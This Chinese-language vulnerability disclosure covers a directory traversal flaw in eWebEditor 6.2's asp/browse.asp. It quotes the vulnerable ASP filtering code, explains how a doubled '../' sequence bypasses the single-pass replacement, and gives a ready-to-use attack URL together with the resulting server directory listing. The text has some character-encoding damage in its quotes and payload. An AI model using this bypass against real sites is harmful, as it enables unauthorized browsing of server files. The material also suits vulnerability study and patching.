eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)

asp/browse.asp部分源码: 复制代码代码如下: Dim s_ReturnFlag, s_FolderType, s_Dir Dim s_CurrDir s_ReturnFlag = Trim(Request.QueryString(\”returnflag\”)) s_FolderType = Trim(Request.QueryString(\”foldertype\”)) s_Dir = Trim(Request(\”dir\”)) Select Case s_FolderType Case \”upload\” s_CurrDir = sUploadDir Case \”shareimage\” sAllowExt = \”\” s_CurrDir = sPathShareImage Case \”shareflash\” sAllowExt = \”\” s_CurrDir = sPathShareFlash Case \”sharemedia\” sAllowExt = \”\” s_CurrDir = sPathShareMedia Case Else s_FolderType = \”shareother\” sAllowExt = \”\” s_CurrDir = sPathShareOther End Select s_Dir = Replace(s_Dir, \”\\\”, \”/\”) \’下面两行是对目录跳转的处理,漏洞存在于此处 s_Dir = Replace(s_Dir, \”../\”, \”\”) \’替换../为空 s_Dir = Replace(s_Dir, \”./\”, \”\”) \’替换./为空 If Left(s_Dir,1)=\”/\” Then s_Dir = \”\” End If Dim s_Dir2 s_Dir2 = Replace(s_Dir, \”/\”, \”\\\”) If s_Dir <> \”\” Then If CheckValidDir(s_CurrDir & s_Dir2) = True Then s_CurrDir = s_CurrDir & s_Dir2 Else s_Dir = \”\” End If End If 代码对../和./进行过滤用来防止目录跳转,但可以通过构造参数饶过检测.由于检测替换只进行一次可以使用….//代替上级目录,程序替换后….//变成../ 攻击代码示例: http://localhost/asp/browse.asp?action=file&type=file&dir=…..///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload 跳转到上eWebEditor的DiaLog目录,查看返回页面的源文件: 复制代码代码如下: <HTML><HEAD><meta http-equiv=\’Content-Type\’ content=\’text/html; charset=gb2312\’><TITLE>eWebEditor</TITLE></head><body><script language=javascript>var arr = new Array(); arr[0]=new Array(\”about.htm\”, \”1.85 KB\”,\”2009-05-29 16:27:06\”); arr[1]=new Array(\”anchor.htm\”, \”3.68 KB\”,\”2009-05-13 16:39:40\”); arr[2]=new Array(\”art.htm\”, \”49.55 KB\”,\”2009-05-13 16:39:40\”); arr[3]=new Array(\”backimage.htm\”, \”9.46 KB\”,\”2009-05-13 16:39:42\”); arr[4]=new Array(\”browse.htm\”, \”20.74 KB\”,\”2009-05-13 16:39:42\”); arr[5]=new Array(\”dialog.js\”, \”6.44 KB\”,\”2009-05-13 22:39:08\”); arr[6]=new Array(\”emot.htm\”, \”3.26 KB\”,\”2009-05-13 16:39:42\”); arr[7]=new Array(\”EQ.htm\”, \”3.48 KB\”,\”2009-05-14 00:02:20\”); arr[8]=new Array(\”eWebEditorActiveX.CAB\”, \”1118.08 KB\”,\”2009-05-14 00:18:40\”); arr[9]=new Array(\”eWebEditorActiveXInstall.exe\”, \”1190.72 KB\”,\”2009-04-11 23:12:48\”); arr[10]=new Array(\”fieldset.htm\”, \”4.11 KB\”,\”2009-05-13 16:39:42\”); arr[11]=new Array(\”file.htm\”, \”5.52 KB\”,\”2009-05-13 16:39:42\”); arr[12]=new Array(\”findreplace.htm\”, \”2.82 KB\”,\”2009-05-13 16:39:42\”); arr[13]=new Array(\”flash.htm\”, \”14.43 KB\”,\”2009-05-13 16:39:42\”); arr[14]=new Array(\”fullscreen.htm\”, \”0.84 KB\”,\”2009-05-13 16:39:42\”); arr[15]=new Array(\”hyperlink.htm\”, \”4.43 KB\”,\”2009-05-13 16:39:42\”); arr[16]=new Array(\”iFrame.htm\”, \”4.24 KB\”,\”2009-05-14 00:31:30\”); arr[17]=new Array(\”img.htm\”, \”13.25 KB\”,\”2009-05-13 16:39:42\”); arr[18]=new Array(\”importexcel.htm\”, \”5.87 KB\”,\”2009-05-13 16:39:42\”); arr[19]=new Array(\”importword.htm\”, \”8.44 KB\”,\”2009-05-13 16:39:42\”); arr[20]=new Array(\”installactivex.htm\”, \”2.02 KB\”,\”2009-05-13 16:39:42\”); arr[21]=new Array(\”i_upload.htm\”, \”7.95 KB\”,\”2009-05-13 22:41:40\”); arr[22]=new Array(\”map.htm\”, \”4.13 KB\”,\”2009-05-13 16:39:42\”); arr[23]=new Array(\”marquee.htm\”, \”2.44 KB\”,\”2009-05-13 16:39:42\”); arr[24]=new Array(\”media.htm\”, \”5.07 KB\”,\”2009-05-13 16:39:42\”); arr[25]=new Array(\”owcexcel.htm\”, \”2.64 KB\”,\”2009-05-13 16:39:42\”); arr[26]=new Array(\”paragraph.htm\”, \”5.95 KB\”,\”2009-05-13 16:39:42\”); arr[27]=new Array(\”paste.htm\”, \”4.50 KB\”,\”2009-05-13 16:39:42\”); arr[28]=new Array(\”quickformat.htm\”, \”13.58 KB\”,\”2009-05-13 16:39:42\”); arr[29]=new Array(\”selcolor.htm\”, \”14.93 KB\”,\”2009-05-13 16:39:42\”); arr[30]=new Array(\”symbol.htm\”, \”14.61 KB\”,\”2009-05-13 16:39:42\”); arr[31]=new Array(\”table.htm\”, \”11.71 KB\”,\”2009-05-13 16:39:42\”); arr[32]=new Array(\”tablecell.htm\”, \”7.98 KB\”,\”2009-05-13 16:39:42\”); arr[33]=new Array(\”tablecellsplit.htm\”, \”2.55 KB\”,\”2009-05-13 16:39:42\”); arr[34]=new Array(\”template.htm\”, \”4.50 KB\”,\”2009-05-13 16:39:42\”); arr[35]=new Array(\”WebEQInstall.cab\”, \”1123.39 KB\”,\”2009-05-14 00:16:16\”); parent.setFileList(\’span_upload\’, \’upload\’, \’../DiaLog\’, arr);</script></body></html>